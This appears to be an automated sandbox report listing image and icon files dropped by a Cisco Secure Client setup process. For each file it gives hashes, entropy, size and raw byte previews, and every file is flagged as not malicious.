                                                                                                                                      File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83111
                                                                                                                                      Entropy (8bit):7.138058183615623
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                      MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                      SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                      SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                      SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......+........%....pHYs...#...#.x.?v.. .IDATx...kn...`..^..#?N...$..d)..c.5d/..ASy.q$Y....y...3.D........................................................................................E.....GW.....P..Z.nC........0\./_Ow?v:...`..x.j=..9.......@....5q....P5.&...hl.....&...hl.....&...hl.....&...hl...M..\v.......P.{.g.h}.;2.@...e#........Xr8.n.....s.er..<.4...fNi......H3.r:.....?u$`'.~.~...dsHN.<.s}.0.qy...x.A<..}7L.y....}^~...].w([U.M`.5..1... .pB.F.>IMc..|..y.].......7...^46.a.....p.c..-...{.`.....,..#x...>I.:......a.........|M.-..k..7:...;...C.........?>~>..)........o9(O.i.'.{.n..~.q....2Q.....W&.....R....Il.....;..~kH|_.R......O....2..}jp....f.1!%..OY....n...F.lfL....W....'.CH,.....g/..y>>~.+*j...$e........Mb..;.........Z...A.:.~...Y|.o1P.A.$...)....~....S;.RR..@...W.&.}.q=.N...:[.C1.5.=...r.U&+._.z.O~o........m......}..t.vcR....u..{...&P..7.......c<....15.?u..5..U.c..........:.*.N.MhPw.=..K..y..>vc.....{;....F>..k......,.-..N...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\cisco_indigo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76349
                                                                                                                                      Entropy (8bit):6.476357962983417
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                      MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                      SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                      SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                      SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............:z....pHYs...#...#.x.?v.. .IDATx.....H. Pi....`...`....<.`!d.`.........X.k.x@y.....KM.{.T.H.Dt..4\.2.....................................................................................................................X.V.<.n........a.9\ ...Af[.7K.C.q.C.K....T..P7.N.k...P.S..O...5..'....1...<8[.8$......@....A.(..!......@....A.(..!......@....A.(..!......@....A.(...j,.....}.q..}...ZU.....y.......c_..U...\].....k.2\.}.j..V7........K.....C.|..{.p^/.m".'.....q...>..J..}wJ.v.....A.-O=oA%o.J.......SG.H@.h[.X7|....P .O..%.P..B@. .... .....P..B@. .... .....P...~(g.k..KjoW...zt....v....('..........2..3.}k.... .-.7.:ts-h..u...X...,w..V..;..i.3.!.<.>..mg..{7>C@....Ye...A@...rS3.A@. .... .....P..B@. .... .....P..B@. .... .....P..B@.t....y......!G...9gg...B.../g..;.%.|p...S..5....&.o'.......6.('8.BZm?...}..T.S:.Z.<..:v..=.5.....}ku.D.3.C_.......F.r9....*.zG=.....c....q.......j?....r.\.G...[^..!......@....A.(..!......@.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\cisco_secure_client.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83426
                                                                                                                                      Entropy (8bit):7.358868361468608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:dixvvTkILgVLxXyJl/WOwiu/PK7KT+vWJv1RASI/sH4PIfeN9Oo:avvTfg5Fyv/WOwiurQWJ9e0H4PoeTOo
                                                                                                                                      MD5:4AC53A86840972B2C8E661710290F3ED
                                                                                                                                      SHA1:D305EC46D2A933DA35D0634B1C23B2657A70CA88
                                                                                                                                      SHA-256:647EFCB4DF9273570A803D5818A37814601B06D41D77A51B61461B12958F028C
                                                                                                                                      SHA-512:86CCC7CA3A4EC721DB91B498E05C4DED79B3BF88E3AF5BCA4198380742B79C69AFF7BCDE7CE15FC09D1C976C37E56298EC3BECAD9254242ACCFAD9CBD6159BA4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......g........@....pHYs...#...#.x.?v.. .IDATx...Mr....N*+.*....O....OeM..W..;Hy.^...Wt..M..$....r]_Gj.A.................................................p.....?.=....._......\..?....|;......T.T*..=S.....i.[.........@.T|......SQ..p**>.N...l.e..>/.2...\.f.."../.2.....i..@atu..\.............Tv..R.........W;....[.....^;..}.O..+....C.7.@:Y..#O....LE..>....x..B-....LE..?..z..Yk.s.g.|.1/.>....}.5..<a...Y..Z..J).......}.....W|.|...!..f*>&.j..f..z-...9..Q.R#c|..m..ww.N....F.E|.......?...?w.p.t....B+...}g...G.1....F...2.........v.M.........]...E..%.us........B...9G.K*.._..5F@.<?....C.E8.-.\[.c.....=.i..PZ53p......<...o.;..O7..w..T....X...\..k....{.....Dv..Y.1..MI.......R......#....0..S.%T|.3..5....|..Q....46.....6ml<..^_.2....k.SJ.>O...A....U...g.\.F.*#j.m.7u......-!.p.4..........!...[..Rh.?......F..5.C....S.W..B~7...0..|.|.*...J.Ze...P...H].u.6....p......P.:i.F.g..$GE...*...ch.3q......J`.wo.,..^......efy.a....s.i.P.l*...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\cisco_secure_endpoint.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16443
                                                                                                                                      Entropy (8bit):7.760065707691873
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                      MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                      SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                      SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                      SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......m......O......tEXtSoftware.Adobe ImageReadyq.e<..?.IDATx...r.H.(l...70.l....L..60}....VrRI.I$_..+.&.:..`kBk......^........H..G.|.*.l}.@......,.........................................................................................................................................................................................................................(.....?...i..........B..]......5._O.L/.2}R:.....}.....i.._...R.+..ez...../......?)...)...[....?..S.......x..g.x7.z...T....H...D.... .....H................ ................ .....H.....=...v./...I..4.......S..:..|..1..._.+.s.......hF....y.....!.....:..<._...).....&.P...e..;l.c... ..W.8.... .*.....1@.l.h...'V...k..IL.L.r..h......q...g];/.T.K..rw=...%?>....kM... .0....IB.yr.....;............... .....H.......... ........n._.......-....,....3..,..Q..L.J.2.._..,..2}R2....@..*....?>..*.~.X/....4...k...L/.2.+...4...._...).....(.)......y..@.@.. ......... ..b..WB....@5..W.Ym...?..)...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\collapse.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0422788649872297
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                      MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                      SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                      SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                      SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\company_logo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):75452
                                                                                                                                      Entropy (8bit):6.447447333863436
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                      MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                      SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                      SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                      SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....H.(Z.1.<....C{@{..\..-...X.....<.....,5.!)..2S.x(.^k.LS.P....4..................................................................................................................%Y.]"".......c.K. ..X.rH'./.5.#...]..........O.S...2..s:...}P.%B. ....Y.P....@.....0.......,.(.da@. ....Y.P....@.....0.......,.(.da@. ..JG.W....w.$...^.o|.[..\.G..=.........k....#..SJ...nm..h..O7%c.2....)....hh.;.Z...e^...c.a.q.,....{.oe...Q..a5g..^.6e^...#B.k..a/%..{aL....0.......,.(.da@. ....Y.P....@.....0.....e..o.{..+".L...wg..~i..PN0......-..z.Z.Yg)..1........m..7...r.Gw..7.$..N.0.*.sW......d@...4..i...P.@D|;5?t0.+........P....@.....0.......,.(.da@. ....Y.P....@.....0..../...7.....kW...i..T...6..F..A#+..s.......(.`....V.-*Z.kCI..>.PN.....eE;.?ou.N...}.k7..\........R.X...w.....}_...#.|..s^....&..z....Z.....8.d)`..9kY.. ....Y.P....@.....0.......,.(..9.n.np....y{W..\.....N0p.j .4.'..&................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\company_logo_alt.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76615
                                                                                                                                      Entropy (8bit):6.470162664157233
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                      MD5:BCB76C77C4A705631EAECEAD63D6A8EF
                                                                                                                                      SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                      SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                      SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....8.(`.T.E...D0..n.............\..;..`G.'...2.....W/.?[.$.y..j...gY.......................................................................................................................W..Tus7..%......m.....Bx.Bx.w......P.QU7.B.gW...k]?;T....J.s....i`9g...m...R{,1e...S...+3V.P..@......"......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!.............G.<...k~..~.B.p....}.d(........>..V.7......~.&..m[...(.{s[.......S..=.0.>..........0p.......aP.4...R.&...I.K.s......=...=.K.Vu.".b.l...Q.(.D!......@....Q.(.D!......@....QX..D......1\h....}}...;}|>.e....;..\t.tE.........9"}|9..&.m.S+...-m:.C3y.K..!..b....mi.....b.>~;..f...f.....S.P...g.......P..B@. ....(.....P..B@. ....(.....P..B@. ....(.....P ....%.P...e......u;.k...&.......=.....h..2(....=..%..A....yH..-..}<...IX.=......yO..U....>yImj[......'.;...B@...i..-.S.n..tnk..m.:..>v......5.g.SI'..f.K.U..e.{......6...+.3y..-:.x..f...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\cues_bg.jpg (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):399779
                                                                                                                                      Entropy (8bit):7.9639437199622165
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:NZGJOTaTKegfZjGiFfyHLyforThgWTZcWX1nQ8WMsETaVovwV:/JT6g5JyjrThgWTZvQ8lsvVnV
                                                                                                                                      MD5:DF0BDC3CDA98B3BE333FEB2A2770002C
                                                                                                                                      SHA1:D0FED726183EBEA0B535EE06A66805E7BF3C9386
                                                                                                                                      SHA-256:FD3413367D94F80DC520390C0971F9AA44003C9C6F32BCBC3303A6682D0B0175
                                                                                                                                      SHA-512:46F9DA519D7D8E1D192D9EB6082FBEAAE164EC58C97C22BB576B8DEEC387B57FFC8CF8BF75412C8FD2B30B9962B96070A679F2E26558099B5DB4411A59E0386D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......JFIF.....H.H.....,Photoshop 3.0.8BIM.........H.......H........D.http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:illustrator="http://ns.adobe.com/illustrator/1.0/". xmlns:pdf="http://ns.adobe.com/pdf/1.3/">. <dc:format>image/jpeg</dc:format>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang="x-default">Ba

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\error.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.044905068349432
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                      MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                      SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                      SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                      SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P........................ne....y...s...s...s...s...s...s...y.&..`...................................................P......................................y.(...0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.......................................@................z]J.X5..M'..M'..M'..>"E...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.........................................xh.M'..M'..M'..M'..M'..nP:.I/T...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`...............................X5..M'..M'..nP:...................y.(...0 ..0 ..0 ..=...0 ..0 ..0 ..0 ..=...0 ..0 ..0 ..(.....y.............................M'..M'..nP:...........................s.0 ..0 ..0 ..=.......WJ..0 ..0 ..WJ......J<..0 ..0 ..0 ....s.........................M'..M'...xh...............................s.0 ..0 ..0 ..0 ..WJ......WJ..WJ......WJ..0 ..0 ..0 ..0 ....s............0.......M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\expand.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0468421318534369
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:rlL14RyS5lhJEO7dVVvydaS+Qu7lfTllv7l3Jl//lHNlP4lp4lX4lR4lf4l54lng:xh4r3rEOKJmfGJ5
                                                                                                                                      MD5:223CC34A3299A5777171F41DF8453CDD
                                                                                                                                      SHA1:559AA03C2FB5D602B4116C16A7D73EE81C99F37B
                                                                                                                                      SHA-256:7E62C5A39DCDD0DFB69F1CCC882579D71DFD4DD345828318F1170AC48ED7F934
                                                                                                                                      SHA-512:5DC60D3801387F534A126D0DE4336993954274BE9696A0D73CE3161C6B2D36B7DCFFC38AD714CCD0CFBDB397FECC9DF845AF4B65215249A7637321F38A5033D6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\gradient.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2213
                                                                                                                                      Entropy (8bit):4.905752993252195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:iY/6A64knA9WIiDYfv4c0POd9Od4LOR3POgHWv:iYSGknmWIiDYfQpOd9OdqOVOgHWv
                                                                                                                                      MD5:A3A99D7E09DE348A18379BA84F5FBD33
                                                                                                                                      SHA1:7E7BE73D74601EA7CCFE7389152D189DA10A275F
                                                                                                                                      SHA-256:A8F0C8E087C47D78EBC0D0D9FBE4BF124F9049BE49A4D7E919D80CEF3E294FD7
                                                                                                                                      SHA-512:414293559F4245B4065246C582D815582E4DFF1E0882CDC3B0439E66204916B9C372D5430C77C49444CB69F61C715337C67275773D76E36C377AB287FEAC2E8E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......&.....2b.5....PLTE...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................h....pHYs................ iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 20

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-0F866.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1916
                                                                                                                                      Entropy (8bit):7.856747119568193
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:22S/53y4Zw3U0f7kxCsJUAxuLYSze4OnbQipPVeOh2JaM9:2lA6aU0fITJUA5Sze4AbQuPVmJaM9
                                                                                                                                      MD5:88A7B064DF22129CF129C4C589E1A92E
                                                                                                                                      SHA1:FE205F326656F8468B6FF7B9702B26E0BA450D35
                                                                                                                                      SHA-256:2E7D51E65DE4287C47C4BA96A394FD678F56F6A4BAAD7E35407BDD7D52DE500D
                                                                                                                                      SHA-512:87015E250E1659A0C5A90C85F85D01DC3B19AE079BA2574A2F6276AFF97E89A6B90BA5AB855EBC7B29AAB26C4ADB64B44EE64E210DCD0A02CCE70529D0FC3910
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]=r[7.....eJ.Kg.M#..~>...H.. ..8.O .L.....T.......p.&.....P.7.G....a..X,...........m..}7:...9...o.u.7.9.,....3...>.x...^R...........y...F.."eC....dzk...5.T.).hHD.US)L.`..x^..eIA2~...`..W.g%.T..ndT.u.d..r.[r.6.6PM.=...|....<..9..j.$'...GJ7.J...s..........<..3...Ip.C..'.....9.....G.H..C.'..n.._&i.!-)....v......'M..p..=M........=..4R...7.$b.;.iH..9.Q.....]P.%.OBL|R.............j.T....Lc.:.):B....f5P.]+..c.>.....!.Tz8.P.N.#..@nw0.H....$.:{...K.. .%......xG...3...OA..,.9..u.b.....<....v.H./.....k~.o...8.%.'.....w.'.'.%....!t.{........).oL...y?_~...K....>j.....]3.%...$.Cr@....l+.`...Y..._0v.4.s...@3._...]{n..)...wRpO....%.w..h2.....v...p/.}..#j.@.d.t.F.HA)..`).r<.....'...cq..WI..>...qy.......h........MJ..B(W. @....\1.SK...pz.kL......2{"hF...H..'.m"........K..2...).3a.....5.NR.an.\}.t6..is0T.&....2...6..H..U_6..E....$g...S..Nm..d+qp/dI......r.b....>....q/.8Qm..I.......%.P......I...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-0FLDB.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29327
                                                                                                                                      Entropy (8bit):7.967732566337996
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                      MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                      SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                      SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                      SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..]le...V...>H.mE .1.[.0#Q.6.%=..l.....ln.sC.8H#.........F..W5.-."vq1..`.:.b4..$H'-.]3.n.d.i..A.].....G..6.^{}..{=?ic...^{.w....?.cV..;B.........4[..n....r....boo..9c.9..<.(g...].{..]O....OY.b.cqq./x..9u.Uk'...R:...'.....=.G'''...t.....>..4...'...h...."...K..../7z.MOF....'....#...>.|...S.j...3g&...~..1.:.:WB.uWJ..R.dT...'!K..rF.&E...^.......Z.........A...E..........`N...s.b. Wx..)[....o'B....}.E+c6..!.._.+Z.......R.B..G..8..D....._..N.....lle........./'#....W..]...........`0......?.^....t.......g?....j..*..C......KE]..z...P..W.k....PWF..aUT=O*.+.7.]...QA..uz.c.D.IOF..w..hx.E.{pp...1Y..-`{ELN..}....7.0...._..Q.6z....MN...Y../..+...'B.W.s.:?....[.NDBr2._..;;..U(..!......I.7.....k..W_.R..j...'...A.......e.o.\.tkm._...S,....'.....].>....dL.z.\.ml...15u.....6^.6w.:.:.U..e.....A;.)...f,,,.z....{Oi9"....$.V.p....h...L.7.u.d.%...1..o..x..J...N5..;...Z...y.I..hj..&."q.O..2..-1.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-13QVT.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.020486157649533
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                      MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                      SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                      SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                      SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T17:58:51-04:00" xmp:MetadataDate="2018-10-19T17:58:51-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c57f0649-d423-40eb-938e-eeff8347c1a5" xmpMM:DocumentID="xmp.did:c57f0649-d423-40eb-938e-eeff8347c1a5"

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-16D5O.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12258
                                                                                                                                      Entropy (8bit):7.976396258951981
                                                                                                                                      Encrypted:false
